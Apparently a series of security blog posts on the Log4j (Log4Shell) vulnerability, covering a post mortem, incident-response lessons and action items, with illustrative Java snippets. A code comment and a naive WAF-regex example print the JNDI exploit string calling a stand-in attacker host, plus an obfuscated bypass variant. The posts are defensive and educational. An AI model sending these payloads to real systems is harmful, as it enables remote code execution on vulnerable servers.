Post Mortem on Log4J

Originally published on the Bright Security Blog. Go check it out!

The purpose of any post mortem is to look into the past in order to find ways to prevent similar issues from happening again, and to improve upon our responses to issues found in the future. It is not to blame others, point fingers, or punish. A proper post mortem states facts, including what went well and what did not, and offers ideas for improvement going forward.

Short rehash: Log4j is a popular Java library used for application logging. On November 26, 2021, a vulnerability was discovered in it that allowed an attacker to paste a short string of characters into the address bar (or any other input that ends up being logged) and, if the target was vulnerable, gain remote code execution (RCE) on the web server. No authentication to the system was required, making this the simplest attack of all time to gain RCE (the highest possible level of privilege) on a victim's system.
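
To make the mechanics concrete, here is a minimal sketch of the vulnerable pattern, with class and method names invented purely for illustration. With a vulnerable Log4j 2.x version on the classpath, simply logging attacker-controlled input was enough to trigger the issue:

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Hypothetical request handler; the names here are invented for illustration.
public class LoginHandler {

    private static final Logger LOGGER = LogManager.getLogger(LoginHandler.class);

    public void handleFailedLogin(String username) {
        // With Log4j 2.0–2.14.x, message "lookups" were evaluated while the log
        // line was formatted. If an attacker submitted a username such as
        //   ${jndi:ldap://attacker.example.com/a}
        // the library could contact the attacker's server and end up loading
        // and executing remote code. Note that the developer did nothing unusual:
        // this is an ordinary, parameterized log statement.
        LOGGER.info("Failed login attempt for user: {}", username);
    }
}
```

This is why the issue was so widespread: any code path that logged user-supplied input, however indirectly, was a potential entry point.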


Points of interest and timeline:

  • This vulnerability was recorded in the CVE database on Friday, November 26, 2021, but was not weaponized until December 9, 2021.
  • This vulnerability is often referred to as #Log4Shell.
  • Log4j is only found in software that uses Java and/or JAR files.
  • Non-Java languages and frameworks (log4net, log4js, etc.) were not affected.
  • Both custom software (made in house) and commercial off-the-shelf (COTS) software were affected, including popular platforms that are household names.
  • Many pieces of software call other pieces of software, including Log4j, and thus were vulnerable despite not seeming to be a problem at first glance.
  • Several servers running middleware were vulnerable to Log4j because the library runs inside that middleware.
  • The CVE is named CVE-2021-44228.
  • Log4j versions 2.0 through 2.14.x were vulnerable.
  • A patch, Log4j 2.15, was released on December 10th, and almost immediately a vulnerability (CVE-2021-45046) was found in it that allowed denial-of-service attacks.
  • Another patch, Log4j 2.16, followed, and it too was deemed vulnerable.
  • On December 17th, a third vulnerability in Log4j, CVE-2021-45105, was disclosed.
  • On December 28th, Checkmarx disclosed another vulnerability (CVE-2021-44832) in Log4j, but it required that the attacker already have control over the logging configuration, meaning the system had already been breached; it was therefore not nearly as serious as the previously reported vulnerabilities.
  • Version 2.17.2 is widely considered the safest version of this library.
  • Log4j 1.x has not been supported since 2015, and while all 1.x versions have several known vulnerabilities, they were not affected by this particular exploit.

As soon as the alert came out, our industry acted. Incident responders immediately started contacting vendors, monitoring networks, researching, and contacting peers for more ideas. Application security teams worked with software developers to find out if any of their custom code had the affected libraries. CISOs started issuing statements to the media. And the entire industry waited for a patch to be released.

What was the root cause of this situation?

A very large percentage of all the applications in the world contain at least some open-source components, which generally have little-to-no budget for security activities, including security testing and code review. On top of this, even for-profit organizations that create software often have anywhere from acceptable to abysmal security assurance processes for the products and components they release. The part of our industry that is responsible for the security of software, often known as application security, is failing.

Key points:

  • Little-to-no financial support for open-source software means there is usually no budget for security.
  • Because there are not enough qualified people in the field of application security, it is extraordinarily expensive to engage a skilled expert to do this work.
  • In most countries there are no laws or regulations controlling or addressing security in IT systems, meaning this industry runs without governmental influence or oversight.
  • Although some groups (such as NIST and OWASP) are trying to create helpful frameworks for software creators to work within, there is no mandate for any person or organization to follow them.
  • The security of software is not taught in most colleges, universities, or boot camps, meaning we are graduating new software engineers who do not know how to create secure applications, test applications for security, or recognize and correct many of the security issues they may encounter.
  • Education for software security is extremely expensive in the Westernized world, pricing it out of reach for most software developers and even organizations.

Impact/Damage/Cost?

Due to companies not sharing information, it is impossible to state specifics in this category. That said, after speaking to a few sources who wish to remain anonymous, the following is likely true:

  • Damages are estimated in the hundreds of millions of dollars for the industry, worldwide.
  • Hundreds of thousands of hours of logged overtime, most likely resulting in or contributing to incident responder employee burnout.
  • Many organizations only applied this one patch and went back to business as usual. That said, some used this situation as an opportunity to create projects to simplify the patching process and/or the software release process, to ensure faster reaction times in the future.
  • Many companies that previously did not think supply chain security was important have updated their views, and hopefully also their toolset and processes.
  • When an accurate cost estimate cannot be created, ‘guesstimates’ are often accepted.

Time to Detection?

  • Most companies (according to anonymous sources and online discussion) spent 2-3 straight weeks working on this issue, dropping all other priorities for the InfoSec teams and most other priorities for those applying patches and scanning.
  • Detection in 3rd party applications and SaaS was extremely difficult, as many organizations issued statements that they were unaffected, only to find out later they had been incorrect/uninformed.
  • Generally, most incident response teams responded the day of the announcement.

Response Taken?

  • AppSec teams checked their SCA tools and code repositories for the offending library and asked for patches/upgrades where necessary.
  • CDNs, WAFs and RASPs were updated with blocking rules.
  • Those managing servers searched dependencies and patched feverishly; a sketch of one widely circulated stop-gap mitigation follows this list.
  • Those managing operating systems, middleware and SaaS wrote vendors to ask for status reports.
  • Incident responders managed all activities, often leading the search efforts.
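
For teams that could not patch immediately, one widely circulated stop-gap was disabling Log4j's message lookups on versions 2.10 through 2.14.x. Below is a minimal sketch of the idea, assuming the setting can be applied before Log4j initializes; it was never a substitute for upgrading, and it was later judged insufficient for some non-default configurations:

```java
// A sketch of the stop-gap mitigation that circulated for Log4j 2.10–2.14.x:
// disabling message lookups. The real fix was upgrading the library, and this
// setting was later judged insufficient for some non-default configurations,
// so treat it as a temporary measure only.
public class Log4jStopGap {

    public static void main(String[] args) {
        // Equivalent to starting the JVM with -Dlog4j2.formatMsgNoLookups=true
        // or setting the LOG4J_FORMAT_MSG_NO_LOOKUPS=true environment variable.
        // It must run before Log4j is initialized to have any effect.
        System.setProperty("log4j2.formatMsgNoLookups", "true");

        // ... normal application startup would continue here ...
    }
}
```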

Lessons Learned? Opportunities for Improvement?

What follows are the author’s ideals for lessons learned. Each organization is different, but below is a list of potential lessons learned by any organization.

  • Patching processes for operating systems, middleware, commercial off-the-shelf (COTS) software, and custom software must be improved. The main threat to organizations from this type of vulnerability is slow updates/upgrades/patches that leave organizations open to compromise for extended periods of time.
  • An incomplete inventory of software assets is a large threat to any business; we cannot protect what we do not know we have. This includes a software bill of materials (SBOM). Software asset inventory must be prioritized.
  • Organizations that learned later, rather than earlier, about this vulnerability were at a distinct disadvantage. Subscribing to various threat intelligence and bug alert feeds is mandatory for any large enterprise.
  • Many incident response teams and processes did not have provisions for software vulnerabilities. Updating incident response processes and team training to include this type of threat is mandatory for medium to large organizations.
  • Most service level agreements (SLAs) did not cover such a situation, and updating these with current vendors would be a ‘nice to have’ for future, similar situations. Adding this to vendor questions in the future would be an excellent negotiation point.
  • Many custom software departments were unprepared to find which applications did and did not contain this library. Besides creating SBOMs and inventory, deploying a software composition analysis tool to monitor custom applications and their dependencies would have simplified this situation for any dev department.
  • Many organizations with extensive technical debt found themselves in a situation where it would require re-architecting their application(s) in order to upgrade off of the offending library. Addressing deep technical debt is paramount to building the ability to respond to a dependency-related vulnerability of this magnitude.
  • There are hundreds of thousands of open-source libraries all over the internet, littered with both known and unknown vulnerabilities. This problem is not new, but this specific situation has brought the issue into the public eye in a way that previous vulnerabilities have not. Our industry and/or governments must do something to ensure the safety and security of these open-source components that software creators around the world use every day. The current system is neither safe nor reliable.

What went well?

  • Incident response teams worked quickly and diligently to triage, respond to, and eradicate this issue.
  • Operational and software teams responsible for patching and upgrading systems performed heroically, in many organizations.
  • Multiple vendors went above and beyond in assisting their customers and the public, responding quickly and completely to this issue.

What could have gone better?

  • Messaging was confused at times, as few knew the extent of this issue at first.
  • The media released many articles that emphasized fear, uncertainty, and doubt (FUD), rather than helpful facts, creating panic when it was not necessary.
  • Companies that produce custom software, but which did not have application security resources, were left at a distinct disadvantage, unaware of what to do for the first few days (before articles with explicit instructions were available).
  • Many vendors issued statements that were just not true. “Our product could have stopped this” and “you would have known before everyone else if you had just bought us”, etc. Although there are some products that may have been able to block such an attack without additional configurations, they were few and far between compared to the number of vendors claiming this to be true of their own product(s).

Action Items

  • Improve infrastructure, middleware, and COTS patching and testing processes.
  • Improve custom software release processes.
  • Request Software Bill of Materials (SBOMs) for all software, including purchased products and those which are home-grown.
  • Create a software asset inventory and create processes to ensure it continues to be up to date. This should include SBOM information.
  • Subscribe to threat feeds and bug alerts for all products you own, as well as programming languages and frameworks used internally.
  • Train your incident response team and/or AppSec team to respond to software-related security incidents.
  • For companies that build custom software: Install a software composition analysis tool and connect it to 100% of your code repos. Take the feedback from this tool seriously and update your dependencies accordingly.
  • Negotiate SBOMs and Service Level Agreements (SLAs) on patching for all new COTS and middleware products your organization purchases. Attempt to negotiate these after the fact for contracts you already have in place.
  • Do your best to keep your dependencies reasonably up to date and address technical debt in a reasonable way. If your entire application needs to be re-architected just to update a single dependency to current, this means your technical debt is currently unacceptable. Make time for maintenance now, rather than waiting for it to “make time for you”, later.
  • Create a process for evaluating and approving all dependencies used in custom software, not just open-source ones. A software composition analysis tool can help from both an implementation and a documentation point of view (a toy illustration of the policy idea follows this list).
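
As a toy illustration of that last action item, the sketch below shows a ‘banned dependency’ gate. It assumes a hypothetical build step has already produced a map of dependency coordinates to versions (in practice an SCA tool or the build system would supply this), and the banned versions listed are illustrative only:

```java
import java.util.Map;
import java.util.Set;

// A toy sketch of a "banned dependency" gate, assuming a hypothetical build step
// that already produced a map of dependency coordinates to versions. It only
// illustrates the policy idea: known-bad versions should fail the build loudly,
// not linger in a report nobody reads.
public class DependencyGate {

    // Versions the organization has decided may not ship. Illustrative values only.
    private static final Map<String, Set<String>> BANNED = Map.of(
            "org.apache.logging.log4j:log4j-core",
            Set.of("2.14.1", "2.15.0", "2.16.0"));

    public static void check(Map<String, String> resolvedDependencies) {
        for (Map.Entry<String, String> dep : resolvedDependencies.entrySet()) {
            Set<String> bad = BANNED.get(dep.getKey());
            if (bad != null && bad.contains(dep.getValue())) {
                throw new IllegalStateException(
                        "Banned dependency in build: " + dep.getKey() + ":" + dep.getValue());
            }
        }
    }

    public static void main(String[] args) {
        // Example: this build would fail until log4j-core is upgraded.
        check(Map.of("org.apache.logging.log4j:log4j-core", "2.14.1"));
    }
}
```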

Focus questions:

Could we have known about this sooner?

The very frustrating question incident responders have been asked over and over again since this happened is: could we have known about this sooner? And the answer, unfortunately, is probably not. Not with the way we, as an industry, treat open-source software.

Could we have responded better?

This is a question only your organization can answer for itself. That said, reviewing the ‘Lessons Learned’ section and implementing one or more of the ‘Action Items’ in this article could certainly help.

How can we stop this from happening again?

Our industry needs to change the way we manage open-source libraries and other third-party components. This is not something the author can answer as a single person; it is something the industry must push for in order to implement real and lasting change. One person is not enough.

Conclusion

It is likely that much of our industry will remain unchanged from this major security incident. That said, it is the author’s hope that some organizations and individuals changed for the better, prioritizing fast and effective patching and upgrading processes, and the repayment of technical debt, setting themselves apart from others as leaders in this field.

Why can’t I get over log4j?

[Photo of Tanya Janca]

I haven’t written in my personal blog in a while, and I have good reasons (I moved to a new city, the new place will be a farm, I restarted my international travel, something secret that I can’t announce yet, and also did I mention I was a bit busy?). But I still can’t get over log4j (see previous article 1, article 2, and the parody song). The sheer volume of work involved in the response was spectacular (one company estimated 100 weeks of work, completed over the course of 8 days), and the damage caused is still unknown at this point. We will likely never know the true extent of the cost of this vulnerability. And this bugs me.

Photos make blog posts better. People have told me this, repeatedly. Here’s a photo, I look like this.

I met up last month with a bunch of CISOs and incident responders to discuss the havoc that was this zero-day threat. What follows are stories, tales, facts and fictions, as well as some of my own observations. I know it’s not the perfect storytelling experience you are used to here; bear with me, please.

Short rehash: log4j is a popular Java library used for application logging. A vulnerability was discovered in it that allowed any attacker to paste a short string of characters into the address bar and, if the target was vulnerable, gain remote code execution (RCE). No authentication to the system was required, making this the simplest attack of all time to gain the highest possible level of privilege on the victim’s system. In summary: very, very scary.

Most companies had no reason to believe they had been breached, yet they pulled together their entire security team and various other parts of their org to fight against this threat, together. I saw and heard about a lot of teamwork. Many people I spoke to told me they had their security budgets increased by multiples, allowing them to hire several extra people and buy new tools. I was told “Never let a good disaster go to waste”. Interesting….

I read several articles from various vendors claiming that they could have prevented log4j from happening in the first place, and for some of them it was true, though for many it was just marketing falsehoods. I find it disappointing that any org would publish an outright lie about the ability of their product, but unfortunately this is still common practice for some companies in our industry.

I happened to be on the front line at the time, doing a 3-month full time stint (while still running We Hack Purple). I had *just* deployed an SCA tool that confirmed for me that we were okay. Then I found another repo. And another. And another. In the end they were still safe, but finding out there had been 5 repos full of code, that I was unaware of as their AppSec Lead, made me more than a little uncomfortable, even if it was only my 4th week on the job.

I spoke to more than one individual who told me they didn’t have log4j vulnerabilities because the version they were using was SO OLD they had been spared, and still others who said none of their apps did any logging at all, and thus were also spared. I don’t know about you, but I wouldn’t be bragging about that to anyone…

For the first time ever, I saw customers not only ask if vendors were vulnerable, but they asked “Which version of the patch did you apply?”, “What day did you patch?” and other very specific questions that I had never had to field before.

Some vendors responded very strongly, with Contrast Security giving away a surprise tool (https://www.contrastsecurity.com/security-influencers/instantly-inoculate-your-servers-against-log4j-with-new-open-source-tool) to help people find log4j on servers. They could likely have charged a small fortune, but they did not. Hats off to them. I also heard of one org that was using the new Wiz.io, and apparently it did a very fast inventory for them. I like hearing about good new tools in our industry.

I heard of several vendors whose customers demanded, “Why didn’t you warn us about this? Why can’t your xyz tool prevent this?” when in fact their tool has nothing to do with libraries, and therefore this is not at all in the scope of the tool. This tells me that customers were quite frightened. I mean, I certainly was….

Several organizations had their incident response process TESTED for the first time. Many of us realized there were improvements to make, especially when it comes to giving updates on the status of the event. Many people learned to improve their patching process. Or at least I hope they did.

Those that had WAFs, RASPs, or CDNs were able to throw up some fancy regex and block most requests. Not a perfect or elegant solution, but it saved quite a few companies’ bacon and reduced the risk greatly. A deliberately over-simplified sketch of the idea follows.
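
To illustrate the idea (and only to illustrate it), here is a deliberately naive version of such a check. Real WAF and CDN rules were far more elaborate, because attackers quickly obfuscated their payloads, which is why this kind of blocking was a risk reducer rather than a fix:

```java
import java.util.regex.Pattern;

// A deliberately simplified sketch of the kind of pattern many teams pushed to
// WAFs and log pipelines. Attackers quickly obfuscated payloads
// (e.g. ${${lower:j}ndi:...}), so a naive check like this is easy to bypass and
// is shown only to illustrate the idea.
public class NaiveLog4ShellFilter {

    private static final Pattern SUSPICIOUS =
            Pattern.compile("\\$\\{\\s*jndi\\s*:", Pattern.CASE_INSENSITIVE);

    public static boolean looksSuspicious(String requestValue) {
        return requestValue != null && SUSPICIOUS.matcher(requestValue).find();
    }

    public static void main(String[] args) {
        System.out.println(looksSuspicious("${jndi:ldap://attacker.example.com/a}")); // true
        System.out.println(looksSuspicious("${${lower:j}ndi:ldap://...}"));           // false: bypassed
    }
}
```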

I’ve harped at many clients and students before that if you can’t do quick updates to your apps, that is a vulnerability in itself. Log4j proved this as never before. I’m not generally an “I told you so” type of person. But I do want to tell every org: “Please prioritize your ability to patch and upgrade frameworks quickly; this is ALWAYS important and valuable as a security activity. It is a worthy investment of your time.”

Again, I apologize for this blog post being a bit disjointed. I wasn’t sure how to string so many different thoughts and facts into the same article. I hope this was helpful.

Discoveries as a Result of the Log4j Debacle

[Photo: Tanya making a silly face. Me, pre-log4j: happier times, before I knew anything about log4j.]

Over the past two weeks, many people working in IT have been dealing with the fallout of the vulnerabilities and exploits being carried out against servers and applications using the popular Log4j Java library. Information security people have been responding 24/7 to the incident, operations folks have been patching servers at record speeds, and software developers have been upgrading, removing libraries, and crossing their fingers. WAFs are being deployed, CDN (Content Delivery Network) rules updated, and we are definitely not out of the woods yet.

Those of you who know me realize I’m going to skip right over anything to do with servers and head straight to the software angle. Forgive me; I know servers are equally important. But they are not my speciality…

Although I have already posted about this in my newsletter, on this blog, and on my YouTube channel, I have more to say. I want to talk about some of the things that I and other incident responders ‘discovered’ as part of investigations for log4j. Things I’ve seen for years that need to change.

After speaking privately to a few CISOs, AppSec pros and incident responders, there is a LOT going on with this vulnerability, but it’s being compounded by systemic problems in our industry. If you want to share a story with me about this topic, please reach out to me.

Shout-outs to every person working to protect the internet, your customers, your organizations and individuals against this vulnerability.

You are amazing. Thank you for your service.

Let’s get into some systemic problems.

Inventory: Not just for Netflix Anymore

I realize that I am constantly telling people that having a complete inventory of all of your IT assets (including web apps and APIs) is the #1 most important AppSec activity you can do, but people still don’t seem to be listening… Or maybe it’s on their “to do” list? Marked as “for later”? I find it defeating at times that having a current and accurate inventory is still a challenge for even major players, such as Netflix and other large companies/teams whom I admire. If they find it hard, how can smaller companies with fewer resources get it done? Responding to this incident made this problem more obvious than ever.

Look at past me! No idea what was about to hit her, happily celebrating her new glasses.

Imagine past me, searching repos, not finding log4j, and then foolishly thinking she could go home. WRONG! It turns out that even though one of my clients had done a large inventory activity earlier in the year, we had missed a few things (none containing log4j, luckily). When I spoke to other folks, I heard of people finding custom code in all SORTS of fun places it was not supposed to be, such as:

  • Public Repos that should have been private
  • Every type of cloud-based version control or code repo you can think of: GitLab, GitHub, Bitbucket, Azure DevOps, etc. And of course, most of them were not approved/on the official list…
  • On-prem, saved to a file server – some with backups and some without
  • In the same repos everyone else is using, but locked down so that only one dev or one team could see it (meaning no AppSec tool coverage)
  • Subversion (SVN), ClearCase, SourceSafe, and other version control systems I thought no one was using anymore… which are incompatible with the AppSec tools I (and many others) had at hand.

Having it take over a week just to get access to all the various places the code was kept meant those incident responders couldn’t give accurate answers to management and customers alike. It also meant that some of them may have been vulnerable with no way of knowing.

Many have brought up the concept of SBOM (software bill of materials, the list of all dependencies a piece of software has) at this time. Yes, having a complete SBOM for every app would be wonderful, but I would have settled for a complete list of apps and where their code was stored. Then I can figure out the SBOM stuff myself… But I digress.
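
As a toy illustration of what an SBOM buys you, the sketch below models a component list for a hypothetical application. Real SBOMs use standardized formats such as CycloneDX or SPDX and are generated by tooling rather than written by hand:

```java
import java.util.List;

// A toy illustration of the kind of information an SBOM entry carries, using a
// hypothetical in-house model. The application name, versions, and hashes below
// are invented for illustration.
public class SbomExample {

    // One component your application depends on, directly or transitively.
    record Component(String name, String version, String license, String sha256) {}

    // The SBOM for one application: the app itself plus every component it ships.
    record Sbom(String applicationName, List<Component> components) {}

    public static void main(String[] args) {
        Sbom sbom = new Sbom("payments-api", List.of(
                new Component("org.apache.logging.log4j:log4j-core", "2.14.1",
                        "Apache-2.0", "<artifact hash>"),
                new Component("com.fasterxml.jackson.core:jackson-databind", "2.12.3",
                        "Apache-2.0", "<artifact hash>")));

        // With an SBOM per application, "do we ship log4j-core anywhere?" becomes
        // a query instead of a multi-week hunt.
        boolean shipsLog4j = sbom.components().stream()
                .anyMatch(c -> c.name().contains("log4j-core"));
        System.out.println(sbom.applicationName() + " ships log4j-core: " + shipsLog4j);
    }
}
```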

Inventory is valuable for more than just incident response. You can’t be sure your tools have complete coverage if you don’t know your assets. Imagine if you painted *almost* all of a fence. That one part you missed would become damaged and age faster than the rest of the fence, because it’s missing the protection of the paint. Imagine year after year, you refresh the paint, except that one spot you don’t know about. Perhaps it gets water damage or starts to rot? It’s the same with applications; they don’t always age well.

We need a real solution for inventory of web assets. Manually tracking this stuff in MS Excel is not working, folks. This is a systemic problem in our industry.

Lack of Support and Governance for Open-Source Libraries

This may or may not be the biggest issue, but it is certainly the most talked-about throughout this situation. The question posed most often is “Why are so many huge businesses and large products depending on a library supported by only three volunteer programmers?” and I would argue the answer is “because it works and it’s free”. This is how open source works. Why not use free stuff? I did it all the time when I was a dev and I’m not going to trash other devs for doing it now…. I will let others harp on this issue, hoping they will find a good solution, and I will continue on to other topics for the rest of this article.

Lack of Tooling Coverage

The second problem incident responders walked into was their tools not being able to scan all the things. Let’s say you’re amazing and you have a complete and current inventory (I’m not jealous, YOU’RE JEALOUS); that doesn’t mean your tools can see everything. Maybe there’s a firewall in the way? Maybe the service account for your tool isn’t granted access, or has access but the incorrect set of rights? There are dozens of reasons your tool might not have complete coverage. I heard from too many teams that they “couldn’t see” various parts of the network, or their scanning tools weren’t authorized for various repos, etc. It hurts just to think about; it’s so frustrating.

Luckily for me I’m in AppSec and I used to be a dev, meaning finding workarounds is second nature for me. I grabbed code from all over the place, zipping it up and downloading it, throwing it into Azure DevOps and scanning it with my tools. I also unzipped code locally and searched simply for “log4j”. I know it’s a snapshot in time, I know it’s not perfect or a good long-term plan. But for this situation, it was good enough for me. ** This doesn’t work with servers or non-custom software though, sorry folks. **
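
For what it’s worth, that “search simply for log4j” step can be roughed out in a few lines. The sketch below is a hypothetical, point-in-time check over a local folder of unzipped code; it will miss transitive dependencies entirely, which is exactly why an SCA tool is the better answer:

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.stream.Stream;

// A rough sketch of the "unzip it and grep for log4j" approach described above.
// It only flags obvious hits (jar names and build-file references); it will not
// catch log4j pulled in transitively by another dependency.
public class Log4jQuickSearch {

    public static void main(String[] args) throws IOException {
        Path root = Path.of(args.length > 0 ? args[0] : ".");
        try (Stream<Path> files = Files.walk(root)) {
            files.filter(Files::isRegularFile)
                 .filter(Log4jQuickSearch::looksRelevant)
                 .forEach(p -> System.out.println("Possible log4j reference: " + p));
        }
    }

    private static boolean looksRelevant(Path p) {
        String name = p.getFileName().toString().toLowerCase();
        // Obvious jar hits, e.g. log4j-core-2.14.1.jar
        if (name.startsWith("log4j") && name.endsWith(".jar")) {
            return true;
        }
        // Build files that may declare the dependency directly
        if (name.equals("pom.xml") || name.equals("build.gradle")) {
            try {
                return Files.readString(p).toLowerCase().contains("log4j");
            } catch (IOException e) {
                return false; // unreadable file: skip it
            }
        }
        return false;
    }
}
```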

But this points to another industry issue: why were our tools not set up to see everything already? How can we tell if our tool has complete coverage? We (theoretically) should be able to reach all assets with every security tool, but this is not the case at most enterprises, I assure you.

Undeployed Code

This might sound odd, but the more places I looked, the more I found code that was undeployed, “not in use” (whyyyyyyy is it in prod then?), part of a paused project, or “Oh, that’s been archived” (except it’s not marked that way), etc. I asked around and it turns out this is common; it’s not just that one client… It’s basically everyone. Code all over the place, with no labels or other useful data about where else it may live.

Then I went onto Twitter, and it turns out there isn’t a common mechanism to keep track of this. WHAT!??!?! Our industry doesn’t have a standardized place to keep track of what code is where, whether it’s paused, just an example, or deployed, etc. I feel that this is another industry-level problem we need to solve; not a product we need to buy, but part of the system development life cycle that ensures this information is tracked. Perhaps a new phase or something?

Lack of Incident Response/Investigation Training

Many people I spoke to who were part of the investigations did not have training in incident response or investigation. This includes operations folks and software developers, who had no idea what we needed or wanted from them during such a crucial moment. When I first started responding to incidents, I was also untrained. I’ve honestly not had nearly as much training as I would like, with most of what I have learned coming from on-the-job experience and job shadowing. That said, I created a FREE mini course on incident response that you can sign up for here. It can at least teach you what security wants and needs from you.

The most important part of an incident is appointing someone to be in charge (the incident manager). I saw too many places where no one person was IN CHARGE of what was happening: multiple people giving quotes to the media, to customers, or to other teams; different status reports that didn’t make sense going to management. If you take one thing away from this article, it should be that you really need to speak with one voice when the crap hits the fan….

No Shields

For those attempting to protect very old applications (for instance, any apps using log4j 1.x versions), you should consider getting a shield for your application. And by “shield” I mean put it behind a CDN (Content Delivery Network) like Cloudflare, a WAF (Web Application Firewall), or a RASP (Runtime Application Self-Protection) tool.

Is putting a shield in front of your application as good as writing secure code? No. But it’s way better than nothing, and that’s what I saw a lot of while responding and talking to colleagues about log4j. NOTHING to protect very old applications… Which leads to the next issue I will mention.

Ancient Dependencies

Several teams I advised had what I would call “ancient dependencies”: dependencies so old that the application would require re-architecting in order to upgrade them. I don’t have a solution for this, but it is part of why log4j is going to take a very, very long time to square away.

Technical debt is security debt.

– Me

Solutions Needed

I usually try not to share problems without solutions, but these issues are bigger than me or the handful of clients I serve. These problems are systemic. I invite you to comment with solutions or ideas about how we could try to solve these problems.